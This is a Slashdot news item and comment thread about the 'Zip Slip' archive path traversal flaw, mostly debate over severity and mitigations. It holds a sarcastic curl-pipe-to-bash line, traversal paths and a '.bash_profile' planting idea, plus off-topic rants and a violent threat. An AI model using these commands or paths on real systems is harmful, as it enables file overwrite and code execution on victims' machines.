Zip Slip Vulnerability Affects Thousands of Projects

Yhcrana writes: Considering the video in the story makes it pretty simple, this is not something I would like to have happen. Apparently it is a flaw in the libraries that are being used by Oracle, Apache, and others. The Register reports: "Booby-trapped archive files can exploit vulnerabilities in a swath of software to overwrite documents and data elsewhere on a computer's file system -- and potentially execute malicious code. Specifically, the flaws, dubbed "Zip Slip" by its discoverers at security outfit Snyk, is a path traversal flaw that can potentially be exploited to perform arbitrary code execution attacks. It affects .zip, .bz2, .tar, .xz, .war, .cpio, and .7z archives.

The bugs, according to Snyk, lie in code that unpacks compressed archives, hence the "Zip Slip" title. When software does not properly check and sanitize file names within the archive, attackers can set the destination path for an unpacked file to an existing folder or file elsewhere on a system. When that file is extracted, it will overwrite the existing data in that same path."

Holy Moly! This is some seriously creepy sh*t!

[Qbertino]

I'm no security expert and even I get the attack after reading it *once*. Imagine injecting alternative userland components into the OS this way. That no one has thought of this yet along with the Spectre and Meltdown shit that has been going on lately makes me wonder what types of trivial exploits we haven't discovered yet.

Creepy as fuck, that's for sure.

Gladly the fix is easy: Default exit before override with an appropriate message. No overriding by unpacking whatsoever. Shouldn't take the devs long to implement that. ... And we just set up 7zip AES256 as the default for critical data transfer that needs to be GDPR compliant at our company last week.

Re:Holy Moly! This is some seriously creepy sh*t!

You can't overwrite the userland unless you are root/admin. If you are and you are downloading and extracting random archives before even listing their contents you deserve to have your userland replaced.

What's next in the security news? `curl https://not-an-exploit.ru/script.sh | bash` being dangerous as root?

Re:Holy Moly! This is some seriously creepy sh*t!

I call bullshit on your being a "security professional".

Unless you're doing something unaudited as an Admin...how would you "overwrite" parts of the OS?

Oh...wait...YOU...CANNOT. Sorry...this is some puffery from a wannabe security services firm and you...you are either a shill or an idiot. So...which is it?

Re:Holy Moly! This is some seriously creepy sh*t!

[Zontar+The+Mindless]

Or you could simply not decompress archives as root?

Re: Holy Moly! This is some seriously creepy sh*t!

I don't even see how this is news... Yes, if you extract an archive with elevated permissions, you can replace files in place. This is simply how archives and writing data works in userspace. This is not a flaw at all. Morons that extract random shit from the internet to the roots of their drives deserve to get pwned.

Re:Holy Moly! This is some seriously creepy sh*t!

[Narcocide]

I call bullshit on your being a "security professional".

What he means is that he's an Oracle admin.

Re:Holy Moly! This is some seriously creepy sh*t!

[Narcocide]

Shhh! They've already thought up the brand name for this hack and if you ruin it for them it will risk sabotaging their upcoming IPO!

Re:Holy Moly! This is some seriously creepy sh*t!

[msauve]

Oh, people have thought of it. The issue has been known for years. The only thing that's surprising is that there's still software which allows it, which can only be due to incompetence. Heck, here's a security book describing the vector (directory traversal) dating to 1996, and it was known long before then.

Re:Holy Moly! This is some seriously creepy sh*t!

I'd guess he's a better at computer security than you are at reading and comprehension.

I'm no security expert and even I get the attack after reading it *once*.

You are the only one claiming GP is a "security professsional".

Re:Holy Moly! This is some seriously creepy sh*t!

Posting as AC since I already modded.

THIS! I don't understand how this is a security flaw. The program works as intended (pretty much). You're unzipping an archive that may overwrite any part of your system. If you don't trust the site you downloaded it from, do it as a user other than root. Hell, do it as another user and then switch to root to do the installation and everything. That's the standard practice.

Re:Holy Moly! This is some seriously creepy sh*t!

[darkain]

"if you don't trust the source" - as if reputable repositories have never been compromised.

Re:Holy Moly! This is some seriously creepy sh*t!

[l0n3s0m3phr34k]

"to be GDPR compliant at our company" We are proactively firing anyone who is an EU citizen, cutting off any direct business with the EU, and literally "burning the bridges" by setting all paperwork and contracts that mention anything EU on fire in a huge bonfire while we all chant "USA! USA! USA!"

Re:Holy Moly! This is some seriously creepy sh*t!

He's not the only one, I'm also making that claim. Normally I wouldn't, but how can I refuse a challenge like this!

Re:Holy Moly! This is some seriously creepy sh*t!

[omnichad]

The default should be that it only unzips under the extraction target path. Optionally, you can preserve destinations outside of that path - with an argument. The default security should be essentially the same as a chroot.

Re:Holy Moly! This is some seriously creepy sh*t!

Hmm. Don't the majority of Docker-deployed apps run as root inside their containers?

They can overwrite their own logic and are remotely accessible.

Re:Holy Moly! This is some seriously creepy sh*t!

The operating system SHOULD enforce all writes, with something like an ACL for each directory and file. If some shit app want to write somewhere else the OS will stop it, assuming the os has reasonable security.

Re: Holy Moly! This is some seriously creepy sh*t!

I think he means "if you didn't pack it yourself"

Re: Holy Moly! This is some seriously creepy sh*t!

I haven't read tfa but I assume they mean that the zip could unpack into ../ even though you specify for the client to unpack into the current directory or into a specified directory

Re: Holy Moly! This is some seriously creepy sh*t!

I also think GP is a security professional

Re:Holy Moly! This is some seriously creepy sh*t!

I see, it's the standard game of blaming the victim as always.

Re:Holy Moly! This is some seriously creepy sh*t!

[Zontar+The+Mindless]

IPO, not ICO? What good are they, then?

Re:Holy Moly! This is some seriously creepy sh*t!

Or, test it, zip in linux and tar both trap the attack vector. Its only some crappy librarys that are affected.
output edited for path's, since it breaks /.'s filter otherwise.

root@testbox:/home/luser# unzip zip-slip.zip
Archive: zip-slip.zip
  extracting: good.txt
warning: skipped "../" path component(s) in ../../tmp/evil.txt
  extracting: tmp/evil.txt

root@testbox:/home/luser# ls /home/luser/tmp/evil.txt

root@testbox:/home/luser# tar -xvf zip-slip.tar
good.txt
tar: Removing leading '../' from member names
tar: ../../tmp/evil.txt: Member name contains '..'
tar: Exiting with failure status due to previous errors

Re:Holy Moly! This is some seriously creepy sh*t!

If you record the raw sound of a fart you can tarball it but manually set the path to /dev/dsp. Then get people to extract it for the fartball exploit. This was one of may favourite tricks in highschool.

Re:Holy Moly! This is some seriously creepy sh*t!

All your important files are stored in userland. Who cares if someone replaces files that only admin has access to? It'll be a bit of an annoyance but you can just reinstall your OS and be fine. But all your documents, browser history, config files, password wallets, browser extensions, and so on and so forth are writeable for the current user. And your computer would be unusable if they weren't.
An archive extractor should never write outside of its destination directory. It serves no useful purpose and can only be used for evil.

Re: Holy Moly! This is some seriously creepy sh*t!

Similar to other comments. Known about this for years.

Re:Holy Moly! This is some seriously creepy sh*t!

[eneville]

Or, test it, zip in linux and tar both trap the attack vector. Its only some crappy librarys that are affected.
output edited for path's, since it breaks /.'s filter otherwise.

This. The libraries that are affected total some thousands, not all projects that use the os tools.

This is another good reason to use containers/micro services for random bits of software. Compartmentalise things, particularly when dealing with untrusted, dirty uploads.

Re:Holy Moly! This is some seriously creepy sh*t!

Yes, that is how it works. The problem is that some decompressors assume that any folder paths inside archives are relative paths. A nefarious individual could create a .zip file, for example, whose file paths are in C:\Windows\System32\ and a stupid decompressor would blindly output files there (if file system permissions allow).

Archive files have worked like this since the days of lharc. I'm surprised there aren't a whole lot of other archive formats listed as "vulnerable."

Re:Holy Moly! This is some seriously creepy sh*t!

[Myself]

Thank you! Yeah, I remember this back in the BBS days. Some boards would unzip uploaded archives to scan them for viruses or duplicate files, and so they were vulnerable to zip-bombs.

Various strategies could render the attacks moot; I think the common one was to initially run pkunzip to only list the contents of the zip without actually unzipping anything. If none of the known attacks seemed to be present, the file could then be unzipped and its contents scanned as usual. There were other mitigations, like unzipping to a ramdrive, which worked well if the system had enough memory, or to a separate partition on the hard drive, since traversal attacks seemed limited to a single filesystem.

Re:Holy Moly! This is some seriously creepy sh*t!

Overwriting system files is one thing, but overwriting customer data is also an issue. Not all access control can be done at the OS level and what can be, you wouldn't want to add 800,000,000 users into activity directory to do so. A service typically runs as one or a handful of OS users, and it is possible for a zip from one customer to be able to affect another customer with this attack.

Re:Holy Moly! This is some seriously creepy sh*t!

[omnichad]

The target is provided as an argument to the software (or graphically in the GUI). An absolute path appended to a relative path is just deeper down.

However, this appears to just use a few "../" in the filenames, which is something that I absolutely would have assumed to be accounted for. What's more worthy of an article is that major software packages don't sanitize this or check the resulting destination against the base path.

I remember this from a quarter century ago

[tap]

I used this to hack a WWIV based BBS system around 25 years ago. Heard about it from somewhere. What you did was place a file with a "..\..\" path into the archive and upload it to the BBS files section. The board would automatically unpack it on upload, or maybe you had to invoke a "download a file from inside a zip" feature on it, my memory is hazy on that. But it would unpack the zip, it would overwrite a executable that was part of the BBS software, and then when it ran that your trojan would run.

Isn't a press release about this kind of like a press release about the concept of buffer overflow exploits?

Re:I remember this from a quarter century ago

Windows Defender won't allow the system file to be overwritten, even if zip tries.

Fake news to distract us from the real news about Professor Stefan Halper that voters need to know.

Re:I remember this from a quarter century ago

Pretty much.

It's also nothing nearly as big as they. /., or the idiot above you makes it out to be.

New low for /., really...which is impressive in and of itself... X-D

Re:I remember this from a quarter century ago

[prowler1]

I know of something similar which happened to a few local BBS's where I lived but the vulnerability was a little different (they ran on Amiga's). Basically, after uploading a file, it would try and extract the file_id.diz file to use to create the file description from. By default, the software just specified the name of the archiver (LHa, LZX, arj, zip etc) and so the software would default to the current working directory which was where the file was saved to. All you had to do was name the file you uploaded to the name of the archiver and it would execute that rather than what it was meant to. The systems which got hit had the RDB nuked and most of the BBS admins thought they lost everything so they formatted their HD's instead of recreating the RDB and really did lose everything.

This was one of those examples were using absolute filenames was the safe thing to do.

Re:I remember this from a quarter century ago

In before some blogger finds zip bombs are still a thing (hint, they are and quite efftective).

Before claiming everything under the Sun (no pun intended), is vulnerable maybe, just maybe it's time to point out IT ISN'T. Sensationalist bullshit as usual.

Honestly this is why I don't trust hosted build servers like travis.

Re:I remember this from a quarter century ago

[omnichad]

No, that's Windows Resource Protection. Windows Defender might show a notice, but you don't have to use it to prevent this at the OS level.

Re:I remember this from a quarter century ago

[ashkante]

Instead, Windows Defender allows you to execute an exploit directly: Hole in Windows Defender You don't even have to be an admin!

Re:I remember this from a quarter century ago

[dromgodis]

Another trick from the dial-up BBS times was to insert a file named "com1:" in the zip archive. When the file was uploaded, the BBS software would unzip the file in order to run a virus scan on the contents before accepting it. The contents of the "com1:" file would then get sent to the modem on com1:.

The contents were Hayes modem commands that hung up, and then sent DTMF codes to the phone company to redirect the phone number to another number, which happened to be on the other side of the Atlantic. At that time, such calls were really expensive, and this let the attacker log in to BBS:es on other continents at the expense of the local BBS operator.

Re:I remember this from a quarter century ago

[AmiMoJo]

This is what happens when you don't properly sanitize file names.

The other classic one was to use an ASCII 255 character as a space on DOS. College had a Netware network that ran on top of DOS, and we found we could create files and directories that the admins couldn't delete simply by adding an alt-255 character to the file name, usually at the end so it wasn't obvious. Their file management tools helpfully filtered it out so couldn't delete it either.

Re:I remember this from a quarter century ago

Back in my Potato days I opened a tarball that left a "*" in my home directory. Wasn't gonna touch that even with a backslash but Midnight Commander handled it without issue. You learn things...

Re:I remember this from a quarter century ago

[khandom08]

Man that brings back memories. I ran a "fast" /X (AmiExpress) board back in those days. There used to be some hacker crews that would extort sysops - basically, "pay us protection fee or your BBS could be hacked/formatted next." And I remember wondering years later when ransomware first hit, if any of the authors were from those old hacker crews.

Re:I remember this from a quarter century ago

Midnight Commander, awesome tool. So many cool features.

VERY OLD issue

I remember this same thing with PKZIP in the BBS days.

What's old is new again I guess.

archive vs compressor

If we are to be precise, xz and bz2 ar not archives. They compress individual files. They are, however, usually paired with tar or cpio.
They are not mentioned in any of the links so the use in this post probably means xz or bz2 compressed tar or cpio archives.

Re:archive vs compressor

[dgatwood]

GNU tar rejects '..' path parts automatically, as does FreeBSD's tar. Does anybody actually still use cpio, other than for extracting the guts of really old OS X installer packages (pre-xar)?

Either way, I can't quite decide who to blame:

• App developers for rolling their own code when existing libraries exist.
• Sun/Oracle for not making it so trivial to integrate C code that nobody would try to write their own implementation for something as ugly as ZIP.
• Open source and free software advocates for license terms that make people afraid to reuse code that works.
• Lawyers, because.

In any case, I don't allow any .Net or Java code anywhere near my computers, so I don't care even slightly. All the C implementations have been secure for decades.

Re: archive vs compressor

Linux initramfs images usually are cpio archives, but other than that I can't think of any widespread use.

Re:archive vs compressor

[Coniptor]

RPM

Re:archive vs compressor

[Narcocide]

Ok, to be fair I'm pretty sure that tar was never fixed and GNU tar was fixed less than a decade ago, but your point still stands as essentially valid.

Re: archive vs compressor

And it is not like Linux uses cpio itself to decompress them ;-)

Re:archive vs compressor

Look, neither rpm, not dpkg (.deb) are vulnerable to this kind of crap [nowadays], precisely because path transversal is as old as /tmp races. They might have been, once, but it has long been found and fixed.

libarchive is one pit of these kind of idiotic security holes, though, but even there it has been fixed (likely several times, it is that bad :p).

Re: archive vs compressor

The sources to GNU tar are distributed as a cpio archive. Interestingly, the sources to GNU cpio are distributed as a tar archive ...

Re:archive vs compressor

[dgatwood]

Holy crap! I just looked at GNU tar's version history. The docs have said that it skips ".." members since IIRC the late 1990s, but apparently it never actually worked, and they just fixed it in 2016!

*redacted swearing*

Re:archive vs compressor

Yes, I remember seeing tar archives with .. which would unpack as recently as 2009 when using GNU tar. It seemed like a pretty big oversight. Glad to see it is finally fixed.

Re:archive vs compressor

2009! I fixed the bug in my tar in 2003! chroot(".") for the win!

Re:archive vs compressor

Does anybody actually still use cpio, other than for extracting the guts of really old OS X installer packages (pre-xar)?

FWIW, Avaya CMS (call management system), which is a very expensive and widely used PBX of sorts, uses compress'd cpio archives for call data archiving.

Also, rpm (redhat package manager) files are cpio archives internally (or at least the unpacking tool, rpm2cpio, uses it), as is the initramfs part of the Linux kernel.

I doubt there is much direct use by end users, but it's still actively used all over the place.

Re:archive vs compressor

[F.Ultra]

Indeed, dpkg was fixed for this in 2010: https://vuldb.com/?id.52167 , couldn't find any relevant CVE for RPM so it was either designed to handle this from start, it was fixed before CVE was a thing or I simply didn't look hard enough. The end result however is the same, nor rpm neither dpkg are vulnerable to this and have not been for years.

Re:archive vs compressor

• Open source and free software advocates for license terms that make people afraid to reuse code that works.

You sound very entitled to things that don't belong to you.

Software developers skilled enough to write "code that works" have produced something of incredible value.

Some of them want to be paid in cash.

Some of them want to be paid in sharing.

Why not blame the closed source "advocates" for their license terms that don't allow people to reuse code that works?

Vulnerability?

[mentil]

I thought this was standard, expected behavior for archive files?
Unzip software is supposed to give a prompt that a file is going to be overwritten, to mitigate that.

Re:Vulnerability?

[quenda]

In Unix, tar does not allow leading "/" or "../" in paths unless over-ridden with the "--absolute-names" option.
Is Zip not the same? Seems kind of obvious, but apparently some library writers forgot.

I'd have thought rather than just looking for such characters in a pathname, the restriction would be enforced by a chroot or other mechanism. No?

Re:Vulnerability?

[Narcocide]

The new way to break into the "security research" market is to brand and report on entry-level system administration pitfalls in an alarmist fashion.

Re:Vulnerability?

decompression software typically has command line parameters to skip an overwrite confirmation. those used in custom or homegrown install or patching routines often use a third party library to decompress, overwrite by default, and rarely if ever, double check the contents of the archive and its destinations beforehand. a triple whammy of exploitable goodness. all it takes is for the unsuspecting developer to use wordpress or drupal to host their site and downloads, to make it easier to replace their distribution files with your own.

Re:Vulnerability?

[msauve]

Maybe we should go back to using .ARC, it avoided the issue by not supporting directories.

Re:Vulnerability?

Windows since Vista will not allow this either. It will prompt the user for administrator password to overwrite files. Even if they are the administrator.

Re:Vulnerability?

[AC-x]

> In Unix, tar does not allow leading "/" or "../" in paths. Is Zip not the same?

Don't forget that if tar only disallowed leading / and ../ then it would still be insecure, as you could do "newfolder/../../../../etc/" and so on.

Re:Vulnerability?

[quenda]

Well that would be silly. Try re-parsing that sentence in a way than makes more sense. Sorry for the ambiguity.
Have some parentheses:

> In Unix, tar does not allow (leading "/") or ("../" in paths) .

Re:Vulnerability?

[avij]

You don't need to be able to overwrite files to cause problems. If you manage to add a new evil.conf file to /etc/httpd/conf.d or /etc/pam.d or /etc/sudoers.d with this exploit, you can do anything you want on the system.

Re:Vulnerability?

[thegarbz]

As pointed out in another thread, the blocking of ../ didn't work and was only very recently (in terms of tar's life) was fixed. tar was vulnerable to this for a good 25 years.

Re:Vulnerability?

[dargaud]

How come nobody noticed ?

Re:Vulnerability?

[AmiMoJo]

While in theory it's fine, in practice two things tend to happen.

1. The user doesn't pay attention and if asked answers "yes, overwrite all" because that's what humans are like.

2. Automated extraction as part of installers and the like often overwrites everything to ensure re-installs work properly.

Re:Vulnerability?

Because people skilled enough to use command line tar are skilled enough to do a tar tf first. After having a tarball extract a bunch of junk in your current directory once, every *nix admin learns quickly to do a tar tf first to see if you need to do a mkdir then cd to the new dir before extracting it.

Re:Vulnerability?

This won't work with PAM. The application needs to specify which PAM configuration file to use or it will need to be included explicitly in another file.

Re:Vulnerability?

[thegarbz]

How come nobody noticed ?

Do you routinely maliciously attack yourself? Firstly history is full of examples of big gaping security holes that have somehow been present since the early days of the PC, even in open source software. Secondly what's the use case that would generally expose this flaw to get it noticed? And finally, how big is the risk given that you need to ultimately grant permission for someone to use that software using your current user permissions in order to be exposed to a threat, a risk quite low and thus even if there was a problem it is unlikely to be given any priority to be looked into.

It's the same reason why I don't patch against Spectre on my home machines. If you're in a position to exploit it, I have lost long before you actually start your side channel attack.

WHAAAAAAHAHAHAHA

puny little You Mans,

This is just a mere small demonstration of our capabilities.

Hu have not even found half of the exploits that are available.

Prepare your time

All your base are belong to us

It's not common

This is not common in any actual *archive* software. Where they were finding it was places where people just rolled their own quickly ("it's only like 20 lines of code, what could go wrong?")

This is why

[quonset]

I never unzip a file to any place other than an empty directory on my desktop. All the files go in one spot, no overwriting of anything. From there I do what I need.

Doesn't matter what it is. If it needs to be unzipped, it goes to an empty spot.

Re:This is why

I never unzip a file to any place other than an empty directory on my desktop. All the files go in one spot, no overwriting of anything.

Your desktop is just another folder, so that won't help any. A new folder on the desktop is only four ".." symbols to the root of your C drive.

In other words, say you unzip the file to the current folder, and you are in "C:\Users\quonset\Desktop\New Folder\"

If the archive contains "../../../../windows/system32/importaint.dll" it will due to the bug end up in your system32 folder instead of the new folder on your desktop.

Re:This is why

[110010001000]

I think the "exploit" is that you can have a file in there with a path like ../../etc/blah and they will go outside of your "empty directory".

Re:This is why

[PPH]

Only if one unpacks the archive as user root. If I am logged in as some typical user, it's not likely that I have write permission anywhere under /etc. The unpacking process will generate an error and odds are that I'd catch it.

Re:This is why

Who cares about root data. All your important things are available under your current account permissions. I highly doubt you maintain a separate account for downloading things from the web.

My trust in software has hit a new low. I though widely known, trivial things like this had already been fixed long ago. I miss GoBack which was a very useful defense from things like this.

Re:This is why

Except when unpacking to something like ~/.bash_logout and planting a privilege escalation exploit ...

Re:This is why

[gnasher719]

I never unzip a file to any place other than an empty directory on my desktop. All the files go in one spot, no overwriting of anything. From there I do what I need.

Doesn't matter what it is. If it needs to be unzipped, it goes to an empty spot.

The whole idea of this vulnerability is that some tools don't restrict themselves to the folder that you specify, but put files elsewhere - no matter where you say you want your files to go.

Re:This is why

[PPH]

I highly doubt you maintain a separate account for downloading things from the web.

Why not? Extra user accounts are free on Linux. Do you really think I do my on-line banking in the same user space that I shit-post Slashdot with?

I send and receive e-mail from separate machines. The receive system can't send e-mail and the sending machines can only pop a copy off the receiver.

Re:This is why

Who cares about root data. All your important things are available under your current account permissions. I highly doubt you maintain a separate account for downloading things from the web.

And are you usually staying on 'root' user in Linux? If not, you are unlikely to be able to write certain files into restricted directory and/or files. User permission in Linux doesn't work the same as in Windows.

Re: This is why

I don't think you understood what he said.

Who gives a shit about system files, when I can overwrite myresume.doc or list_of_bank_accts.txt. Allmypasswords.txt.

Re:This is why

chmod a-w ~/.bash_logout

User land == not kernel

[raymorris]

User land is everything that's not the kernel.
All of your personal files? User land.

I take it you mean:

Most of the time, you can't overwrite important system files unless:
1. You're in the administrator group on Windows
2. You are root on Linux, using a whitelisted program to alter a whitelisted file in a specifically allowed way
3. You're root and using a 1993 version of Linux
4. The last time you looked at SELinux was 15 years ago. 15 years ago, it was inconvenient to use, so you've been turning it off ever since.

Re: User land == not kernel

1. If you mess something up there is a system file integrity check & restore you can do.

Re: User land == not kernel

[houghi]

Another: You add sudo before every command when you run Ubuntu.

Re: User land == not kernel

Spoiler: SELinux is still inconvenient.

Re: User land == not kernel

[Zero__Kelvin]

Luckily having your system compromised because you are too lazy to spend the minimal effort involved in learning how to use SELinux isn't inconvenient at all.

Re: User land == not kernel

[cloudmaster]

So many people post without having any creativity... Here's a helpful example:

Unzip to ../../.bash_profile knowing that this is run in $HOME/.programrc/modules/
Include "sudo runstuff" in new file
Profit

Re: User land == not kernel

Good luck writing a policy for your app with SELinux, and then spending your time debugging why every piece fails in very subtle ways.

Re: User land == not kernel

[Zero__Kelvin]

I have done so many times. It is very easy to do if you actually put the effort into learning it, which again, takes minimal time and effort.

Re: User land == not kernel

[F.Ultra]

Are you sure that people are actually doing that?

Re: User land == not kernel

sudo mod +1 insightful

Re: User land == not kernel

GP was just being elitist as usual.

Slow Clap

[Quzak]

Congrats on breaking it, hero.

That's how it works.

[waveclaw]

At first glace I thought this was a joke. This 'overwriting of existing files' is how Zip, tar, Arch, 7zip and really any archive works.

The problem is real but is at a higher level. It is a classic lack of validating user input. Usually filtering out relative path names is enough (the path foo/bar/../../../../../../../etc/rhosts is not a valid location.). Combined with bad operational practices your application is overwriting /etc/passwd and /etc/shadow while processing my_little_brony_avatar.zip.

User facing applications, probably running as root, that don't limit their archive unpack to some safe sub-path can overwrite anything. Even if your application is installed to some place (e.g. /opt/vendorname,) locked down to a user and even running with (IMHO bad) SELinux types it can unpack a file and overwrite a library, plugin, configuration file or even the binary for the app itself.

The article may be a wake up call for the clueless. How many developers never thought about how unpacking an archive actually works?

For the rest it is a sensational piece based on the idea that open doors do in fact let people walk through them. That is how doors work. It is up to you to close the door and lock it.

I expect a follow up report about how unpacking a zip file downloaded from your email client can overwrite critical files on your desktop. Maybe call it "Mail Slip." Reserve a domain and a $5/mo AWS host. Use an icon with feral dogs instead of cats this time.

Re:That's how it works.

[110010001000]

I don't get it. Where is the lack of validating user input? Why would you filter out foo/var../../../../etc/hosts or whatever? Is there a rule that says that relative path names aren't allowed in archives and archives can only be extracted to subdirectories? Aren't archives supposed to work like they are currently and allow files to be overwritten?

Re:That's how it works.

There's nothing wrong with having upwards relative paths in archives. What's wrong is general unpacking programs accepting that without either confirming with the user, or rejecting it outright for more specialized uses. Many of the affected programs are using the archive formats for packaging specific content for which there is no valid use for upwards traversal, like libraries for a build system that are supposed to be self-contained within their unpack location. I'm not sure this is a significant issue compared to the other problems incurred when these systems are exposed to untrusted input, though.

Re:That's how it works.

SQL injection works by parsing "SELECT title, value FROM table WHERE value=val" with a value of "1;DROP TABLE USERS" without ensuring "val" is a literal value.

In this case, /foo/bar/../../../../../../etc/hosts shouldn't be treated as a relative directory for the same reason -- the path of inside the zip file is not intended to contain "backtracking" paths. Expected user experience is, the file contains a path to the current directory and "expands" below it. Never above.

So, the unpacking code really should have treated the ".."s as invalid characters in the path, rather than trying to resolve it.

Re:That's how it works.

Why would you filter out foo/var../../../../etc/hosts or whatever?

Why would you allow it? It's purely an artifact of storing paths as strings instead of storing the path implicit as part of tree structure like you would in an actual filesystem. Having "../etc/password" in an archive makes as much sense as having "../etc/password" in a directory on your filesystem: None at all. If you want to write all over the filesystem, you can already do that with archives that contain "etc/password", just instruct the user to extract the archive at the top level.

Re:That's how it works.

SQL injection works not because of not validating user input, but because the valid user input was not actually used.

If you actually had "1;DROP TABLE USERS" in "val" and used a preparedStatement or properly escaped it, then it would work correctly.

You know what you get when you "properly validate" input for SQLInjection. You get the problem of not being able to enter or search for Irish names like O'Leary.

Re:That's how it works.

[Zontar+The+Mindless]

I thought that most programming/scripting languages/APIs had unescape() or decode() sorts of functions for handling just this type of issue...?

You're looking at it wrong. Caveat Emptor.

Ok - so here is rule number 1. Do not unpack files without checking. Rule number 2. Do not unpack files as root. Rule 3. Reread rule 1 and 2.

There is no alternative. This examples is kinda stupid. What if you zip a symlink that links to ../../../../../../../ and call it "special" and in "special" you have "bin/sh" - unpacking will not violate anything until the OS is asked to resolve the symlink.

The take home message is that this kind of validation is not the realm of the unpacking software. Configuring a system with proper privilegse is a required step. Barring that, the user expect to get owned and have thei content trashed.

Enough said. Next story please.

Not as disgusting as Hillary, Destroyer of Worlds

Just ask the millions of thousands of people slaughtered by the foreign interventions she, Bill and their ilk cooked up. Apparently genocide is less offensive to you than some unsavory comments by an old man.

um

If you expand a path that includes traversals (like "../") into the actual absolute path and then
(a) fail to check the validity of the resulting expanded path, or
(b) fail to verify that the resulting complete file name and path is not already in use,
then you have COMPLETELY FAILED TO "VALIDATE USER INPUT"

I chalk problems like this up to incompetent "coders" pasting together a bunch of "free" libraries they found on the internet with the software equivalent of chewing gum, used band-aids, and spit. Such would-be programmers have no clue about how "their" "program" actually works, cannot properly test/debug it, and cannot fix it when users find a problem.

This is bone-head level incompetence. Buffer overruns and filesystem path expansion hacks are some of the oldest stupid vulnerabilities there are - If they are in code that is less than 25 years old, then a moron at a keyboard (who is better suited to ask "you want fies with that?") is to blame.

Another lose for Ambient Authority

[ka9dgx]

Ambient Authority, the design flaw underlying most "modern" operating systems, strikes again.

Re:Not as disgusting as Hillary, Destroyer of Worl

[Zontar+The+Mindless]

Don't you have an election somewhere that you're supposed to be fixing?

Depends

[DrYak]

- Lots of Linux daemons are designed to drop root privileges and switch to another UID/GID as soon as possible.
  - Some are designed to coordinate with other tools (such as systemd or formelly inetd) that handle root-level actions themselves (like grabbig a low number port and hand an already opened socket), so starting a serivce though those doesn't even require root access to the daemon.

So as long as a the daemon are well designed and follow such good practices, they won't ever run as root.

Of course then you have lots of quickly thrown together crap written in the latest high-level scripting language du jour that was quickly packaged together into docker because that language isn't even incorporated into the current stable Linux distros.
(You know the same kind of software that relying on git-pulling javascript modules from 10'000 different git repos, and completely break because someone decide to retire their string-alignement function)
Typical authors of such "things" probably won't follow best practice.

Luckily, the container infrastucture inside the Linux kernel features uid namespaces (and docker uses those).
So the user root is only root inside the docker, but actually maps to uid 45869 or something similar outside the container.
This virtualised root user has only admin rights within the container.
Also docker leverages the capabilties system of the kernel, so those admin rights can only manage a very small subset of things.
And only very few things are actually offered within a container (eg.: it doesn't have access to the real network, only to a virtual bridge that's not connected to the net. The docker deamon on the host system is in charge in setting up some routing if the container is to have net access).

So any attack that try to over right files is pretty much limited even if the server process inside insists on not following best preactices and on running as root.
The daemon can basically wreck itself but that's about it.

Re: Depends

[reanjr]

If that daemon is is - say - a PHP server with access to your data, then the fact that the problem is "isolated" to the PHP instance is not very helpful.

Docker - as it is usually recommended for setup - is not a good fit for production for this reason. It'r possible to make Docker secure, but it's so much work it's usually easier to just not use Docker in production.

Re: Depends

Docker is meant to isolate an environment, not a system. Even Docker claims that Docker is not meant to be used as a security measure and one should not treat Docker as a way to secure an environment. Most, if any, of the "security" that Docker may give is an arbitrary side effect, not an engineered result.

SELinux, AppArmor...

Any half decent MAC will prevent this issue.

Re:Not as disgusting as Hillary, Destroyer of Worl

Da!

Impersonating me again? Ok... apk

I said all I have to say here (& you RAN as you stalk me by unidentifiable anonymous posts or impersonate me) https://yro.slashdot.org/comments.pl?sid=12190270&cid=56731102/ you disgusting little punk.

APK

P.S.=> One day, I'll find out WHO & WHERE you are & fuck you up... apk

So.. am I the only one?

[gosand]

When I am manually un-archiving files, I *always* list out the contents first before actually un-archiving. (tar -tzvf, unzip -l, etc.) And I scan the output for anything that doesn't look right. The main reason I do this is because I have been burned before by assuming the archiver put all the files in a directory instead of just dumping them wherever the archive is located.... then I had to spend time to delete those files by hand to clean things up. But also because I just want to see it before just dumping things onto my machine.

Did this with tar files

[ctilsie242]

Back in the 1990s, it was trivial to compromise a machine by having a tar file with absolute paths in it, so /etc/shadow got overwritten when the admin decided to untar a "sendmail patch" that he or she was given.

That attack is still valid today. Untar a file as root, there might be a good chance that an absolute path may be in that file.

Bigger than just archives

[Chelloveck]

Holy cats, guys! I've found that this same security hole exists in 'mv'!

mv evil.txt test/../../Documents/Thesis.odt

How many programs are affected by this?!!?

P.S. Anyone know how to undelete a file? Plz let me know before Friday!

Re: Holy Moly! This is some seriously creepy sh*t

"That's exactly right" - Milton T Pike

Check for the other one!

[SuricouRaven]

There are two great holes in archive formats, traditionally. This is one.

The other is the 'zipbomb.' An exabyte of file consisting of nothing but 0x00 bytes, all nicely packed down to practically nothing by the compression algorithm. If precautions are not taken, guaranteed to crash your target be exhausting either memory or disk space.

Really?

Isn't this the way zip packages are supposed to work?

It's kinda like saying that downloading an .exe and running it can result in bad shit happening. Well, duh. That's why you don't do it unless you know and trust the .exe file and the downloads source.